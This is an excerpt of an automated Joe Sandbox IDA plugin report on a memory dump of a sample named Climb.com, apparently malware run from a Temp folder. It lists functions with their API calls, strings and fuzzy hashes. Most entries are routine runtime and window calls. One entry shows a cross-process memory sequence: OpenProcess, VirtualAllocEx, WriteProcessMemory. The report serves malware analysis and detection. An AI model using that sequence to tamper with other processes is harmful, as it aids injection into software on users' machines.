Part of subcall function 000E2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4), ref: 000E2D4E
Part of subcall function 000E2D38: GetLastError.KERNEL32(00181DC4,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4,00181DC4), ref: 000E2D60

_free.LIBCMT ref: 000EDAE4
_free.LIBCMT ref: 000EDAF6
_free.LIBCMT ref: 000EDB08
_free.LIBCMT ref: 000EDB1A

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 28ceb21f9e7a3b77df6df51df9188ffb54907700bc8d4ac46fc9aaded749e188
Instruction ID: e0f6b7ba3010722fd53cd7ce4a01a3c4fc2b981486db9d8855c22858da6d6000
Opcode Fuzzy Hash: 28ceb21f9e7a3b77df6df51df9188ffb54907700bc8d4ac46fc9aaded749e188
Instruction Fuzzy Hash: E3F0FF3254828CAF8664EB5AF981C5A77FDEF047107990C06F109F7911CB20FCC08655

Function 000E2610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 000E262E

Part of subcall function 000E2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4), ref: 000E2D4E
Part of subcall function 000E2D38: GetLastError.KERNEL32(00181DC4,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4,00181DC4), ref: 000E2D60

_free.LIBCMT ref: 000E2640
_free.LIBCMT ref: 000E2653
_free.LIBCMT ref: 000E2664
_free.LIBCMT ref: 000E2675

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 60bc1103373f8bee558e68d7eeb2ee1565c8e42e61111bb65dcdcfa421c378b1
Instruction ID: 3fd3a6e66e129929f95a20e6827288d3a31b69144eb4af6a32fea5b13c33885d
Opcode Fuzzy Hash: 60bc1103373f8bee558e68d7eeb2ee1565c8e42e61111bb65dcdcfa421c378b1
Instruction Fuzzy Hash: A8F0DA758051689F8712EF55FC018883BBDBF28B613050A0AF518B6A76C7310AD2AF86

Function 000E12B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 000E1469
__freea.LIBCMT ref: 000E1487

Part of subcall function 000E18A7: _free.LIBCMT ref: 000E18BF

Strings

am/pm, xrefs: 000E14EA
a/p, xrefs: 000E154E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 550a272d215057836645ed57ab8a75346808a5c608550a711c994d73cafd60da
Instruction ID: c592ff7671d798b3140c0715c4f913b1cc6ef8c3aab9cc0072d1ba6d52e4415b
Opcode Fuzzy Hash: 550a272d215057836645ed57ab8a75346808a5c608550a711c994d73cafd60da
Instruction Fuzzy Hash: 7ED1F175900286DECB689F6AC8557FEB7F1FF45700F28415AE942BB291D3359E80CBA0

Function 00113063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0011BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00112B1D,?,?,00000034,00000800,?,00000034), ref: 0011BDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 001130AD

Part of subcall function 0011BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00112B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0011BDBF

Part of subcall function 0011BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0011BD1C
Part of subcall function 0011BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00112AE1,00000034,?,?,00001004,00000000,00000000), ref: 0011BD2C
Part of subcall function 0011BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00112AE1,00000034,?,?,00001004,00000000,00000000), ref: 0011BD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0011311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00113167

Strings

@, xrefs: 0011317F

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 989d4211e08eef45f7d9491270bfd87c0d4246c643d6bdccdafa067e336b7971
Instruction ID: 95ac6d8fd45503b23e0546b43c426b801aa888cca5affbd6025a15b0ecda9543
Opcode Fuzzy Hash: 989d4211e08eef45f7d9491270bfd87c0d4246c643d6bdccdafa067e336b7971
Instruction Fuzzy Hash: 12414976900218BEDF14DBA4CC81ADEBBB8EF49304F0040A9FA55B7184DB706F85CB61

Function 000E1A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user~1\AppData\Local\Temp\768400\Climb.com,00000104), ref: 000E1AD9
_free.LIBCMT ref: 000E1BA4
_free.LIBCMT ref: 000E1BAE

Strings

C:\Users\user~1\AppData\Local\Temp\768400\Climb.com, xrefs: 000E1AD0, 000E1AD7, 000E1B06, 000E1B3E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user~1\AppData\Local\Temp\768400\Climb.com
API String ID: 2506810119-3461223814
Opcode ID: c684d1c9b396c095be1c6cdd480793191cf7c90ad5bb6cc40030327e440faa99
Instruction ID: 8644f65c3170dd0f7519d15298d514bc532306fabe0e3480a9bef305dcff30f7
Opcode Fuzzy Hash: c684d1c9b396c095be1c6cdd480793191cf7c90ad5bb6cc40030327e440faa99
Instruction Fuzzy Hash: 6B319671A04258AFCB21DF9ADC85DEEBBFDEF85710B1441A6F804A7211E7708E81CB91

Function 0011CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0011CBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 0011CBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001829C0,00DEF7D8), ref: 0011CC40

Strings

0, xrefs: 0011CB8A

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 6c73705db17417c902c4959818a17d75372740a2419908420b4c9bd0d98e7ebb
Instruction ID: 02627325dd87705d0fb6e6b2f3ee27a06f61e59dc7765e03360008ec9bd85546
Opcode Fuzzy Hash: 6c73705db17417c902c4959818a17d75372740a2419908420b4c9bd0d98e7ebb
Instruction Fuzzy Hash: 4A41C3312443029FD728DF24D884B9ABBE4AF85714F04462DF46997391CB30E984CBD6

Function 00144EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0014DCD0,00000000,?,?,?,?), ref: 00144F48
GetWindowLongW.USER32 ref: 00144F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00144F75

Strings

SysTreeView32, xrefs: 00144F1A

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 96ccaea5e841e11c15546e4d93bf06f76e770109e419dcd00fe3d732ee4f95d2
Instruction ID: 9e4d7be81185226f70c1ea532e021109a725c9c9d987fbb07b1c03e8ec98ddde
Opcode Fuzzy Hash: 96ccaea5e841e11c15546e4d93bf06f76e770109e419dcd00fe3d732ee4f95d2
Instruction Fuzzy Hash: 1F31BC71210205AFDF218F38DC45BEA7BA9EF09338F204724F979A21E1CB70AC949B50

Function 00133AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00133DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00133AD4,?,?), ref: 00133DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00133AD7
_wcslen.LIBCMT ref: 00133AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00133B63

Strings

255.255.255.255, xrefs: 00133AF2, 00133AF7

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 820d3de284c79751e8aef4b22a1a8399b7996923f2a6c5748badedb3d3bf9ff9
Instruction ID: 83b3db65bca55d74d569cdf3eb783fd90610ee4241a66652a60b2c4ed3205b0e
Opcode Fuzzy Hash: 820d3de284c79751e8aef4b22a1a8399b7996923f2a6c5748badedb3d3bf9ff9
Instruction Fuzzy Hash: 6D31B3396002019FCB10CF68C585EA9BBF0EF15328F258159E8269B7A6D771EE45C764

Function 00144954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001449DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001449F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00144A14

Strings

SysMonthCal32, xrefs: 001449A7

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 2630c33a7fc457779072fde2104991e94d6fd3a52746fd8ffc861fe8ab6208f8
Instruction ID: 339238de34687a6f50f03c4175bfdd6f8bad5b9f5076f8a91fd1d68f53bd16f3
Opcode Fuzzy Hash: 2630c33a7fc457779072fde2104991e94d6fd3a52746fd8ffc861fe8ab6208f8
Instruction Fuzzy Hash: 0E21BF32650229BBDF158F50DC46FEB3B69EF48718F110214FA156B1E0DBB1A8919B90

Function 001450F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001451A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001451B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001451B8

Strings

msctls_updown32, xrefs: 00145122

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 563edf17774ade604fe7bababf19186e770bb8038abeccaf828f3fad9a0feae6
Instruction ID: 926894a4691aa924dcc2ed5295ed6fb668b104795c93a20133e0351173b18866
Opcode Fuzzy Hash: 563edf17774ade604fe7bababf19186e770bb8038abeccaf828f3fad9a0feae6
Instruction Fuzzy Hash: B12171B5600609AFDB11DF14DC81DBB37ADEF5A768B040059F9009B362CB70EC51CBA0

Function 00144253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001442DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001442EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00144312

Strings

Listbox, xrefs: 001442AB

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 39ad843e6e7e1792a5311f8bac6e09b277a85bc0500bc81dd0762a121dc6dc86
Instruction ID: 2eda7439a7a7744005abd6ab9931dfb59335b19935837cce5418a83312a9be50
Opcode Fuzzy Hash: 39ad843e6e7e1792a5311f8bac6e09b277a85bc0500bc81dd0762a121dc6dc86
Instruction Fuzzy Hash: A4216272654118BBEF118F94DC85FAF376EEF89754F118114F9059B1A0CBB19C5187A0

Function 00125439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0012544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001254A1
SetErrorMode.KERNEL32(00000000,?,?,0014DCD0), ref: 00125515

Strings

%lu, xrefs: 001254B4

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: dddf9f4cbb3b070363e868831ece2161abe62f38b6dc1666d1d95d5eb67a949f
Instruction ID: 7c62f8d05ea617d103d19bd237a32fe704f7f0d0b6339615b4df127f8c37e17a
Opcode Fuzzy Hash: dddf9f4cbb3b070363e868831ece2161abe62f38b6dc1666d1d95d5eb67a949f
Instruction Fuzzy Hash: 9F314474A00109AFDB10DF54D885EEA77F9EF09304F1440A9F909DB262D775EE45CB61

Function 00144C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00144CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00144D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00144D0F

Strings

msctls_trackbar32, xrefs: 00144CC4

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 56fca99303c79fef23defac2ad4812c69bafd9665391639b517a14545e772664
Instruction ID: 4b0979954c20183cdbe883ad82bd175f6e0d735fbfbf8f3f5c04c886fc57061c
Opcode Fuzzy Hash: 56fca99303c79fef23defac2ad4812c69bafd9665391639b517a14545e772664
Instruction Fuzzy Hash: E611E071240248BFEF215F69CC46FAB3BA8EF99B65F110524FA55E20A0C771DC519B20

Function 0011389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A

Part of subcall function 001136F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00113712
Part of subcall function 001136F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00113723
Part of subcall function 001136F4: GetCurrentThreadId.KERNEL32 ref: 0011372A
Part of subcall function 001136F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00113731

GetFocus.USER32 ref: 001138C4

Part of subcall function 0011373B: GetParent.USER32(00000000), ref: 00113746

GetClassNameW.USER32(?,?,00000100), ref: 0011390F
EnumChildWindows.USER32(?,00113987), ref: 00113937

Strings

%s%d, xrefs: 0011394B

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 765ab9b07201fbd7f9320a147f5544e91fa69543e2ea8897ae8ab4f1cd89b987
Instruction ID: bdfa0c35121dee66b9705815f8a1c4c552c8b6c48a4c9fa1a6926ccd5695c8a2
Opcode Fuzzy Hash: 765ab9b07201fbd7f9320a147f5544e91fa69543e2ea8897ae8ab4f1cd89b987
Instruction Fuzzy Hash: 7711D5B5600209ABCF15BF749C85AED776EAF94304F008079F9199B2A6DF705A85CB20

Function 00146321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00146360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0014638D
DrawMenuBar.USER32(?), ref: 0014639C

Strings

0, xrefs: 0014632E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 319f36b69e996f6cfa31d7de896de8e1b567a2c4f72f5328da8f65a90630e6be
Instruction ID: 20f49ad36ede64eb694307613ec73d746d6d2f754abba8403fc9b113a54f65d8
Opcode Fuzzy Hash: 319f36b69e996f6cfa31d7de896de8e1b567a2c4f72f5328da8f65a90630e6be
Instruction Fuzzy Hash: 76016D35500258AFDF119F11DC84BAE7BB5FB46355F10809AE84DDA161DF308A85EF32

Function 0011096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18d88eeea90cd1e22047b4baa4729bca7dcf8a00514988669687f4f3fb3bf043
Instruction ID: eb8f94da40758f4d8ecad06426a97b1532fdcabe9b88a27395ce3a58d69a8df0
Opcode Fuzzy Hash: 18d88eeea90cd1e22047b4baa4729bca7dcf8a00514988669687f4f3fb3bf043
Instruction Fuzzy Hash: BBC14875E0020AAFCB09CF94C894BAAB7B5FF48704F1585A8E505AB251D7B1EEC1DB90

Function 000E41F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 000E427E
__alldvrm.LIBCMT ref: 000E447F
__alldvrm.LIBCMT ref: 000E44A1

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction ID: 55a8fb7a9e97197d204e17830a6fac5366e04eb89b77af5fdefbf3b59cc62e0e
